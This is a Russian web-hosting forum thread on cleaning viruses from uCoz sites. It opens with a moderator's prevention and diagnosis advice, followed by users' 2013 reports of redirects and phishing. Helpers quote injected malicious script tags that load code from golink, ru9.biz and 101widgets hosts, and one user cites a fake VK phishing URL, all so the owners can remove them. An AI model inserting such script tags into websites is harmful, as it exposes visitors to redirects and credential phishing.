Вирусы на сайтах
|
|
Сообщение # 1 |
22:08:04
21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт - Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.
- Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.
- В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса
- Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.
- Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.
Диагностика - Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров - Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
- Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)
Правила подачи заявки на диагностику и поиск вредоносного кода на сайте - Вы должны предоставить ссылку на сайт!
- Вы должны дать описание проблемы:
1) на какой странице сайта обнаруживается проблема (ссылка)
2) проблема обнаруживается только под логином или под гостем тоже
3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки
4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки
Полезные ссылки: Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:
Сообщение от Модератор форума
|
AndruFrol
Сообщений: 9
Сообщение # 481 |
19:55:18
16 Авг 2013
Добрый вечер! Интернет магазин Рюкзачок http://ryukzachokshop.ru/ При просмотре сайта с андроид устройства вместо перехода на страницы сайта по вкладкам "О магазине", "Оплата и доставка", "Обмен и возврат", "Регистрация" происходит переадресация на сайт для обновления браузера brusonline.net Если зайти с компьютера (Vista, Браузер Chrome), то вкладка "Регистрация" переадресовывает на страницу вконтакте с предупреждением о блокировки аккаунта ( http://vk.com.feed.14.7219829.ru/?v=yPaE0eWAyodZn6nbgIzdmYpSmafel4jal4hp%3D ) . Остальные вкладки работают нормально.
Происходит и под гостем и под админом Антивирус не реагирует
Спасибо за помощь!
|
webanet
Сообщений: 24067
Сообщение # 482 |
20:02:47
16 Авг 2013
AndruFrol, панель управления - дизайн - управление дизайном - быстрая замена - в поле что заменить вставляем скрипт
Код <script language="javascript" src="http://golink2.ru9.biz/js/back.php?id=43"></script> - поле на что заменить оставляем пустым и производим замену во всех модулях после очистки меняем пароль uID профиля. инструкция по замене пароля тут //forum.ucoz.ru/forum/45-52299-1
|
nataliVL
Сообщений: 18
Сообщение # 483 |
14:18:27
17 Авг 2013
Здравствуйте!Помогите пожалуйста!У меня сайт,сайт школы перестал нормально работать. Исчезли некоторые фотографии, вместо них пустые рамочки, а также непонятные ссылки.Что надо делать? и еще непонятные люди пишут комментарии на англ.языке, в день таких приходит около 20 комментарий. Что с этим делать?Заранее благодарна
|
bandjuk
Сообщений: 6816
Уровень замечаний:
Сообщение # 484 |
14:28:20
17 Авг 2013
nataliVL, 1. Картинки заливайте только на свой сайт, на других сайтах и просто могут удалить. 2. Цитата (nataliVL) и еще непонятные люди пишут комментарии на англ.языке, в день таких приходит около 20 комментарий. обычный спам, запретите гостям комментарии, или поставьте сложную капчу. Главное! блок "Годинник" удаляйте скрипт: <script language="JavaScript" src="http://101widgets.com/03025111/180/180"></script> блок "До 1 вересня..." <script language="JavaScript" src="http://101widgets.com/0000021b/170/230"></script> и не ставьте всякую гадость с других сайтов
|
oxy_sev
Сообщений: 11
Сообщение # 485 |
17:07:50
17 Авг 2013
|
bandjuk
Сообщений: 6816
Уровень замечаний:
Сообщение # 486 |
17:15:47
17 Авг 2013
oxy_sev, воспользуйтесь быстрой заменой и удалите скрипты: <script language="javascript" src="./js.php?s=50"></script> <script language="javascript" src="./js.php?s=54"></script> <script language="javascript" src="./js.php?s=54"></script> <script language="javascript" src="http://golink1.ru9.biz/js/back.php?id=43"></script> <script language="javascript" src="http://golink1.ru9.biz/js/back.php?id=43"></script> <script language="javascript" src="http://golink1.ru9.biz/js/back.php?id=43"></script>
И смените уид пароль. инструкция тут //forum.ucoz.ru/forum/45-52299-1
|
oxy_sev
Сообщений: 11
Сообщение # 487 |
17:16:49
17 Авг 2013
А быстрая замена это что?
|
bandjuk
Сообщений: 6816
Уровень замечаний:
Сообщение # 488 |
17:17:56
17 Авг 2013
|
oxy_sev
Сообщений: 11
Сообщение # 489 |
17:25:19
17 Авг 2013
Получилось произвести замену 1-го и 4-го скрипта, остальное не нашел... Надо еще что-то сделать?
|
bandjuk
Сообщений: 6816
Уровень замечаний:
Сообщение # 490 |
17:27:31
17 Авг 2013
oxy_sev, странно, прийдётся Вам вручную искать в шаблонах эти скрипты
|
oxy_sev
Сообщений: 11
Сообщение # 491 |
17:27:54
17 Авг 2013
Обратная связь заработала и глюки с гостевой книги вроде ушли. БЛАГОДАРЮ!!!! Это все шаблоны страниц надо проверить?
Сообщение отредактировал oxy_sev - Суббота, 17 Авг 2013, 17:29:09
|
bandjuk
Сообщений: 6816
Уровень замечаний:
Сообщение # 492 |
17:32:14
17 Авг 2013
Цитата (oxy_sev) Обратная связь заработала и глюки с гостевой книги вроде ушли. в обратной связи осталось это: <script language="javascript" src="./js.php?s=54"></script><script language="javascript" src="./js.php?s=54"></script> Цитата (oxy_sev) Это все шаблоны страниц надо проверить? всё-таки быстрая замена должна сработать пробуйте. И обязательно поменяйте пароль
|
oxy_sev
Сообщений: 11
Сообщение # 493 |
17:42:34
17 Авг 2013
<script language="javascript" src="./js.php?s=54"></script> - вот это со второго раза нашел и заменил, а вторую половину почему-то нет... ( Буду еще пробовать и пароль поменяю. Благодарю!
|
bandjuk
Сообщений: 6816
Уровень замечаний:
Сообщение # 494 |
17:59:06
17 Авг 2013
Цитата (oxy_sev) а вторую половину почему-то нет... ( так они вроде как одинаковые ) Уже чисто, по крайней мере на указанных страницах ничего нет
|
oxy_sev
Сообщений: 11
Сообщение # 495 |
18:03:33
17 Авг 2013
Упс, точно одинаковые... Это я в режиме паники становлюсь невнимательной :))) Благодарю за быструю помощь!!! теперь на душе стало легче....
|